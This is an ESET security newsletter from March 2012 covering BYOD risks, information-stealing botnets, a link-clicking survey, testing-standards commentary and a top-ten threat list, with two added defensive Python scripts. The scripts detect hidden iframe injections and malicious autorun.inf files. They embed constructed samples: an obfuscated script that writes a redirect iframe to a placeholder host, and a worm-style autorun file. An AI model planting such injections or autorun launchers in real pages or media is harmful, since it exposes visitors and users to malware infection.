March 2012 Feature Article: Sizing Up The BYOD Security Challenge



Table of Contents

- Sizing Up the BYOD Security Challenge
- Java Holes and Targeted Attacks
- Gender and the Success of Suspicious Links
- AMTSO, Testing, and ESET's Dutch Treat
- The Top Ten Threats
- Top Ten Threats at a Glance (graph)
- About ESET
- Additional resources

Sizing Up the BYOD Security Challenge
Stephen Cobb, ESET Security Evangelist

Do you let your employees use their own computers for work? How about smartphones, iPads and other tablet devices? If so, you are not alone. The phenomenon of allowing or encouraging employees to use their own devices for work--known as Bring Your Own Device, or BYOD--is now widespread in many countries. On the plus side, you may get more work from people when they can work in more places and at more times of the day (from the breakfast table in the morning to the kitchen table at night and the coffee shop in between). There can be cost savings too: equipment outlays can be reduced if employees use their own devices instead of the company buying them.

At the same time, IT security managers must weigh those benefits against the security risks that come with these devices, plus the cost of bringing them into line with existing security policies and compliance standards. For example, what are the legal ramifications of an employee's personal laptop going missing when it contains your customer list or sensitive internal correspondence?

To help companies get a handle on the scale and scope of these risks, ESET engaged Harris Interactive to survey some 1,300 adults in America who are currently employed. We found more than 80 percent of them "use some kind of personally owned electronic device for work-related functions." Many of these devices are older technologies like laptop and desktop computers, but smartphones and tablets are already a significant part of the BYOD phenomenon.

Unfortunately, the survey paints a worrying picture of security on these devices; for example, encryption of company data is only happening on about one third of them. One third of those surveyed responded that company data is not encrypted when it is on their personal devices, and the remaining third did not know one way or the other, which is worrying in itself. You can see more of the findings in the accompanying infographic.

One particular area of concern is small devices—like tablets and smartphones—that are easier to steal than laptops and desktops but pack tremendous processing, storage, and communication capabilities. Consider the Microsoft Word document in which the results of ESET's BYOD survey were presented. This file takes up 170 kilobytes of storage space and contains 17 pages of charts, tables, and text that summarize the most important findings from this not inexpensive research. That means you could easily store more than 70,000 similar reports on a 16 gigabyte smartphone or microSD card. A smartphone could transmit all 70,000 documents to the other side of the world in a matter of minutes on a WiFi or 4G/LTE connection (the latter could prove costly, but the recipient might be happy to pay the data overage).

So it is not good news to learn that only 25 percent of smartphone users, and less than 10 percent of tablet users, say they have enabled auto-locking on these devices (the feature that locks the device after a period of inactivity and requires a password or code to unlock). Overall, we found that less than half of all devices in the BYOD category are protected by basic security measures. On the bright side, BYOD security could be boosted cheaply and quickly if companies did the following:

- Mandate auto-locking with password protection on all devices.
- Enable remote lock/wipe to protect data on any stolen devices.
- Enable encryption of company data on all devices.
- Make sure up-to-date anti-malware protection is active on all devices.

In summary, now would be a good time to check how your company is handling BYOD security. With roughly two thirds of our survey respondents reporting that their employer had not yet implemented a BYOD policy, or provided any security training, those would be good places to start.

Java Holes and Targeted Attacks

March produced a number of important new insights into malware threats, and ESET researchers around the world were hard at work bringing these to light. Here we highlight three threats, starting with the information-stealing trojan that ESET dubbed Win32/Georbot.

The name Win32/Georbot is derived from Georgia, the country in Eurasia, because ESET researchers found the malware was receiving updates from a domain belonging to the Georgian government. Of course, that does not mean the malware, or the botnet created with it, had anything to do with the Georgian government (in fact it should be noted that the Data Exchange Agency of the Ministry of Justice of Georgia and its national CERT cooperated with ESET on this matter). However, from our analysis of the code it appears that citizens of Georgia might be the intended target of the malware's information-stealing capabilities. A review of the stealing functionality of this malware is a reminder of how pernicious such threats can be. Once it infects a system, Win32/Georbot can:

- Send any file from the local hard drive to the remote server
- Steal certificates
- Search the hard drive for Microsoft Word documents
- Search the hard drive for remote desktop configuration files
- Take screenshots
- Record audio using the microphone
- Record video using the webcam
- Scan the local network to identify other hosts on the same network
- Execute arbitrary commands on the infected system

And those are just the information-stealing capabilities of this botnet. Interestingly, these commands are not automated but activated manually, sent to each host individually rather than being broadcast to all infected hosts. ESET researchers were able to gain access to the botnet's control panel and in doing so discovered lists of keywords used to search through Word files on infected machines. For more on this threat, you can find a summary of our analysis in a blog post cleverly titled From Georgia With Love, and the full report is available as a PDF file.

The second recently discovered threat we want to highlight is great news for conspiracy theorists because it is a second information-stealing botnet with manual controls and geopolitical targeting. This time the country is Tibet and the target appears to be NGOs (Non-Governmental Organizations). We published a detailed analysis of the Mac OS X payload delivered by this malware, dubbed OSX/Lamadai.A. Although this code exploits a vulnerability that Apple patched some time ago (Java vulnerability CVE-2011-3544), we did see infections, and our researchers were able to observe communications between a sacrificial test machine and the botnet's C&C (Command and Control, the software from which the botnet owner, or botmaster, monitors and manages the infected machines). In fact, we observed the botmaster typing in commands as he or she looked for sensitive files on our machine.

The third in our trio of highlighted threats continues the Java theme: a new exploit for the Java CVE-2012-0507 vulnerability found in a new version of the Blackhole exploit kit. These days, Java vulnerabilities are the number one target for exploit kit developers because they are the most effective way of exploiting end-user systems and can sometimes be effective across a variety of platforms. Our write-up of this latest example tracks many incidents involving the infection of popular and legitimate Russian sites where iFrames redirect victims to the latest version of Blackhole. Yet again we are reminded that it is imperative to keep your patches current and your antivirus updated.
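The Blackhole incidents above, and the HTML/ScrInject.B, HTML/Iframe.B, JS/Iframe.AS and JS/Redirector entries in the Top Ten later in this report, all rest on the same mechanism: a legitimate page is injected with an invisible IFRAME, or with an obfuscated script that writes one, and the visitor's browser fetches the exploit kit without anything visible changing. The Python script below is an added example of the kind of heuristic a page scanner applies to spot such injections; it is not ESET's detection logic. The two HTML documents in it are constructed samples (hostnames under the reserved .invalid TLD), and the thresholds it uses (a frame of 1 px or less, two or more obfuscation markers in one script) are illustrative choices, not published detection criteria.

```python
"""Heuristic scan of an HTML page for injected redirects: hidden IFRAMEs and
obfuscated scripts that write one.  Added example built around the Blackhole
iFrame injections described above; it is not ESET's detection logic.  Both
pages below are constructed samples."""
import re
from html.parser import HTMLParser

# Inline styles that keep a frame out of the user's sight
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d", re.I)

# Signs of script obfuscation; two or more in one <script> is treated as suspect
OBFUSCATION_MARKERS = (
    re.compile(r"\bunescape\s*\("),
    re.compile(r"\bfromCharCode\s*\("),
    re.compile(r"\beval\s*\("),
    re.compile(r"document\.write\s*\("),
    re.compile(r"(?:%[0-9a-f]{2}){8,}", re.I),    # long %XX-encoded run
    re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),  # long \xNN-encoded run
)


def _tiny(value):
    """True for a width/height attribute of 1 px or less."""
    try:
        return int(re.sub(r"px$", "", (value or "").strip(), flags=re.I)) <= 1
    except ValueError:
        return False


class RedirectScanner(HTMLParser):
    """Collects (kind, detail) findings while the page is fed through."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or HIDDEN_STYLE.search(a.get("style") or ""))
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            hits = sum(1 for m in OBFUSCATION_MARKERS if m.search(body))
            if hits >= 2:
                self.findings.append(("obfuscated-script", body.strip()[:60]))


def scan_html(page):
    """Return the findings for one HTML document as a list of (kind, detail)."""
    scanner = RedirectScanner()
    scanner.feed(page)
    scanner.close()
    return scanner.findings


# Constructed sample: a news page with a 1x1 hidden frame and an obfuscated
# writer script; the percent-encoded string decodes to a second iframe tag
INJECTED_PAGE = """<html><body><h1>News</h1>
<iframe src="http://example.invalid/in.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<script>var s=unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22http://example.invalid/go.php%22%3E%3C%2F%69%66%72%61%6D%65%3E');
document.write(s);</script>
</body></html>"""

# Constructed sample: a visible embedded video frame and an ordinary script
CLEAN_PAGE = """<html><body>
<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>
<script>document.getElementById('y').textContent = new Date().getFullYear();</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page) or "no findings")
```

Real injections vary the hiding technique (CSS classes defined elsewhere, frames created at run time, markers split across several scripts), so a scanner like this is a triage aid rather than a verdict; the durable defences remain the ones the article closes with, current Java and browser patches and updated antivirus.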

Gender and the Success of Suspicious Links
Urban Schrott, ESET Ireland

A new ESET Ireland study reveals which online topics may be irresistible, compelling both men and women to click on links even if they seem suspicious.

Recently ESET Ireland commissioned a survey to find out under what circumstances people would click on a suspicious link in social media, online ads or unsolicited email (spam). In other words, would they still click even if they were not sure it was safe to do so, knowing that it could be fake or malicious?

The good news is that 49 percent of those surveyed said they would not click, regardless of the type of "bait", such as an unbelievably low price on a popular product or news of a major disaster. Of course, everyone has heard the phrase: if it looks too good to be true, it probably is. Our Irish colleagues have been telling Irish computer users this for some time with regard to spam and various online offers that promise incredible deals. The fact that about half of all users can resist the urge to click dodgy links suggests that the message is getting through, but what about the other half?

The survey revealed that money-saving offers were the most irresistible (29%), followed by disaster news (25%). Free movie and music downloads lured some people (16%), as did free game downloads (10%). Celebrity gossip and photos were an admitted weakness for some (12% and 11% respectively). Advertisements promising easy money tempted 13%, while social media apps lured 12%.

Perhaps it is not surprising, but the survey also revealed interesting gender differences when it came to temptation. For example, satisfying the shopping urge was worth a risky click for one in three women, but only one in four men were tempted by shopping offers. However, the roles reverse when it comes to free downloads. There males are far ahead in recklessness, as 20% (even up to 23% in the 15-24 age group) of males and only 12% of females will engage in downloading music, films or computer games from dodgy websites, which could cause malware infection in the process.

Disaster news appears to be equally interesting to females and males, but particularly interesting to youths (30% of the 15-25 age group). Our Irish colleagues found one more positive note: it seems the Irish have not yet succumbed to the celebrity obsessions of some other nations, because less than 12% appear susceptible to the dangers of suspicious links to celebrity photos or gossip.

What to do and how to know what to click on?

Of course, the point of the survey was to draw attention to the problems that can arise from giving in to temptation when you see an alluring but suspicious link. A significant percentage of malware infections rely on this type of user interaction. So here are some tips to share with friends, family and colleagues in the workplace:

- Act responsibly and don't just click on everything you find appealing. Internet fraudsters are counting on your curiosity to help them spread malware and lure people into financial scams.
- Do your online shopping on reputable websites and make sure they have the safety certifications for secure payments.
- Get your world news from known news websites, from your local TV or radio stations' websites, etc. Many scams are spread through email and social media by pretending to show "yet unseen footage" from some recent disaster.
- And, as always, think before you click!

AMTSO, Testing, and ESET's Dutch Treat
David Harley, ESET Senior Research Fellow

Righard Zwienenberg is not only an enormously respected security researcher but also an old friend (well, nowhere near as old as I am, but not many people are, though Stephen Cobb is getting there!), and I was very pleased to hear, after many years at Norman (and at Thunderbyte before that), that there was a possibility of his joining ESET. Since he joined ESET in February as a Senior Research Fellow (yes, we're replicating virally) in the Technology Division at ESET HQ in Bratislava, he's introduced himself with a volley of heavy-hitting blog articles:

- Password management for non-obvious accounts
- SKYPE: (S)ecurely (K)eep (P)ersonal (E)-communications
- The security of unlocking an Android based device, the future is near?
- From Georgia With Love: Win32/Georbot information stealing Trojan and botnet

However, it turned out that there was a slight problem. For most of the past three years, Righard and I have both been on the Board of Directors of AMTSO (the Anti-Malware Testing Standards Organization), of which Righard is the President, and two directors representing the same member entity is against the organization's bylaws. So I've stepped down from the Board a little earlier than anticipated (I wasn't planning to stand for re-election this year, so it was an easy decision). Rest assured (if you do find it reassuring!) that I still represent ESET N. America in AMTSO and will continue to engage with the organization, I still wholeheartedly support AMTSO's aim of raising testing standards, I will continue to do authoring jobs on behalf of AMTSO when I can find time, and I have every intention of commenting even more regularly on testing issues. In fact, I'll be presenting a paper on "After AMTSO: a Funny Thing Happened on the Way to the Forum" at EICAR in May (and, by way of a complete contrast, another on PIN selection strategies).

That sounds a bit as if I'm predicting the death of AMTSO at EICAR. Well, no, I'm not sending for the undertakers yet. However, part way through the second day of the recent workshop in San Mateo, a major shift in direction was proposed. AMTSO's initial attempts to make testers and reviewers more accountable for the accuracy of their tests and test reports through a 'review of reviews' analysis, attempting

to assess whether a review was compliant with the organization's 'Fundamental Principles of Testing', attracted a great deal of (mostly negative) attention. The new proposal covers too much ground to summarize in a short article, but a key component is the revival of the idea of tester accountability in a different form: primarily, a more general review of the testing landscape commissioned from academia.

I expect that proposal to excite a great deal of debate at the next AMTSO meeting in May, and I'm not going to attempt to predict what the final outcome will be. Personally, I have no problem with the principle of tester accountability. And it seems to me that there is an undercurrent of admission here that AMTSO has failed to convince the world that it's an impartial commentator on testing issues rather than simply a mouthpiece for companies selling a frequently denigrated technology: it needs to channel the undoubted expertise of its participants (vendors and testers) via a credible, trusted third party. The success of this proposal, if adopted, may well depend on how consistently both testers and vendors within the AMTSO community (both members and subscribers) can put the well-being of the community ahead of their own vested interests as commercial organizations.

It's all too easy to write off security researcher concerns about the standard of testing as 'vendor whining': a lot of media comment is based on the assumption that vendors hype and testers expose weaknesses. However, it's worth remembering that testers (the professionals, at any rate) also have a commercial agenda, and it's not always easy to detect bias in a comparative test report.

The major certification testers are in a state of ongoing negotiation with the vendors who are their customers, trying to strike a balance between maintaining their independence and keeping the vendors who are their customers, and the same principles are maintained by good vendor-sponsored comparatives, though not always with due credit. And that's not a bad thing: those checks and balances help to keep everyone honest. But sometimes the business relationship between a particular vendor and an apparently impartial report is far from transparent. Sometimes an apparently independent tester is underwritten by a single AV company, and may even be covertly hosted by such a company.

Don't get me wrong: there are many honourable instances of information resources that are not only open about their association with a particular vendor, but whose independence is nevertheless generally unquestioned (Virus Bulletin testing is, perhaps, the star example). However, there are always going to be doubts when a testing organization isn't open about such links (or, come to that, its methodology), however good its tests may be. Or when it describes itself as a 'sponsor-independent' tester while requiring large consultancy fees from companies whose products it tests before discussing verification of its testing. (And don't get me started on the 'we'll let you see the samples – or in some cases, the simulated attack – but only if you sign a form that stops you talking about it in public' gambit.)

The Top Ten Threats

1. HTML/ScrInject.B
Previous Ranking: 1
Percentage Detected: 5.60%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect to the malware download.

2. INF/Autorun
Previous Ranking: 2
Percentage Detected: 5.19%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun's frequent return to the number one spot clearly indicates. Here's why it's a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn't always the program's primary distribution mechanism, malware authors are always ready to build in a little extra "value" by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it's better, as Randy Abrams has suggested in our blog (http://blog.eset.com/?p=94 ; http://blog.eset.com/?p=828), to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy's blog 5/nowyou-can-fix-autorun useful, too.

3. HTML/Iframe.B
Previous Ranking: 3
Percentage Detected: 3.95%
Type of infiltration: Virus

HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

4. Win32/Conficker
Previous Ranking: 4
Percentage Detected: 3.44%

The Win32/Conficker threat is a network worm originally propagated by exploiting a vulnerability in the Windows operating system. This vulnerability is present in the RPC subsystem and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it's important for end users to ensure that their systems are updated with the Microsoft patch (MS08-067), which has been available since October 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at /ms08067.mspx. While later variants dropped the code for infecting via Autorun, it can't hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://blog.eset.com/?cat=145

It's important to note that it's possible to avoid most Conficker infection risks generically, by practicing "safe hex": keep up to date with system patches, disable Autorun, and don't use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that's been remediable for so many months, we'd expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there's no indication of a significant drop in Conficker infections covering all variants.

5. JS/Agent
Previous Ranking: 90
Percentage Detected: 2.30%

The trojan displays dialogs that ask the user to purchase a specific product/service. After the product/service is purchased, the malware removes itself from the computer. The trojan is probably a part of other malware.

6. JS/Iframe.AS
Previous Ranking: 66
Percentage Detected: 2.04%

JS/Iframe.AS is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

7. Win32/Sirefef
Previous Ranking:
Percentage Detected: 1.76%

Win32/Sirefef.A is a trojan that redirects the results of online search engines to web sites that contain adware.

8. Win32/Sality
Previous Ranking: 8
Percentage Detected: 1.72%

Sality is a polymorphic file infector. When run, it starts a service and creates/deletes registry keys related to security activities in the system and to ensure that the malicious process starts at each reboot of the operating system. It modifies EXE and SCR files and disables services and processes related to security solutions.

More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality nar virus sality aasality am sality ah

9. Win32/Dorkbot
Previous Ranking: 7
Percentage Detected: 1.68%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX. The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

10. JS/Redirector
Previous Ranking: 47
Percentage Detected: 1.59%

JS/Redirector is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.
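As an added example of what the INF/Autorun heuristic described above has to look at, the following Python script parses an autorun.inf the way a scanner might, tolerating the junk lines a strict INI parser would reject, and reports every directive that would make Windows Autorun or AutoPlay run a program or disguise what it is about to run. It is not ESET's detection code. Both files inside it are constructed samples: one in the style of a removable-media worm (a launcher parked under a RECYCLER folder, an action= caption that copies Explorer's own "Open folder to view files" entry) and one a plain vendor driver CD. The audit categories and the spoofing patterns are the author's illustrative choices.

```python
"""Audit an autorun.inf for directives that Windows Autorun/AutoPlay would act
on.  Added example modelled on the INF/Autorun description above; it is not
ESET's heuristic.  Both sample files below are constructed."""
import re

# [autorun] or an architecture-specific [autorun.<arch>] section header
SECTION = re.compile(r"^\[\s*autorun(?:\.\w+)?\s*\]$", re.I)
# Directives that name a program to launch
LAUNCH_KEYS = ("open", "shellexecute")
# shell\<verb>\command=... binds a program to a context-menu verb; with
# shell=<verb> that verb also becomes the drive's double-click action
SHELL_COMMAND = re.compile(r"^shell\\[^\\]+\\command$", re.I)
# Caption text that imitates Explorer's own AutoPlay entry
EXPLORER_LIKE = re.compile(r"open folder|view files", re.I)
# Launch targets parked in folders users rarely open
HIDEOUT = re.compile(r"recycle|system volume information", re.I)


def parse_autorun(text):
    """Return {lower-case key: value} from the [autorun] section.

    Lines that are not key=value (comments, padding, binary junk) are
    skipped instead of aborting the parse; a repeated key overwrites the
    earlier value here."""
    entries, inside = {}, False
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            inside = bool(SECTION.match(line))
            continue
        if inside and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip().strip('"')
    return entries


def audit_autorun(text):
    """Return (reason, value) findings describing what the file makes Windows do."""
    e = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        if key in e:
            findings.append((f"runs program via {key}=", e[key]))
    for key, value in e.items():
        if SHELL_COMMAND.match(key):
            findings.append((f"context-menu verb runs {key}=", value))
    if "shell" in e:
        findings.append(("default double-click verb overridden by shell=", e["shell"]))
    if "action" in e and EXPLORER_LIKE.search(e["action"]):
        findings.append(("AutoPlay caption mimics Explorer via action=", e["action"]))
    for _, target in list(findings):
        if HIDEOUT.search(target):
            findings.append(("launch target hidden in a system folder", target))
            break
    return findings


# Constructed sample in the style of a removable-media worm: padding lines,
# a launcher under a RECYCLER folder, and a caption copied from Explorer's
# own AutoPlay entry so the user picks the wrong "Open folder"
WORM_INF = """\
[AutoRun]
;padding that a strict INI parser would choke on
xZq9!*&#  ,,.
open=RECYCLER\\setup.exe
action=Open folder to view files
shell\\open\\command=RECYCLER\\setup.exe
shell=open
"""

# Constructed sample of a benign driver CD: it still auto-launches a program
VENDOR_INF = """\
[autorun]
open=setup.exe
icon=setup.exe,0
label=Printer Driver CD
"""

if __name__ == "__main__":
    for name, inf in (("worm-style", WORM_INF), ("vendor", VENDOR_INF)):
        print(name)
        for reason, value in audit_autorun(inf):
            print(f"  {reason:<50} {value}")
```

Note that the benign vendor file also produces a finding: open=setup.exe is exactly what Autorun was designed to do, so no heuristic can separate intent from mechanism, which is the point of Randy Abrams' advice above to turn the mechanism off rather than rely on detection. On Windows the documented way to do that is the NoDriveTypeAutoRun value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer (0xFF disables Autorun for every drive type), on a system carrying the update Microsoft describes in KB967715 so that the value is honoured for autorun.inf.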

Top Ten Threats at a Glance (graph)

Analysis of ESET's ThreatSense.Net, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 5.60% of the total, was scored by the HTML/ScrInject.B class of threat.

About ESET

ESET is a global provider of security software. The ESET NOD32 Antivirus and ESET Smart Security products are consistently recognized among the most comprehensive and effective security solutions available today.

Additional resources

Keeping your knowledge up to date is as important as keeping your AV updated. For these and other suggested resources please visit the ESET Threat Center to view the latest:

- ESET White Papers
- ESET Blog
- ESET Podcasts
- Independent Benchmark Test Results
- Anti-Malware Testing and Evaluation

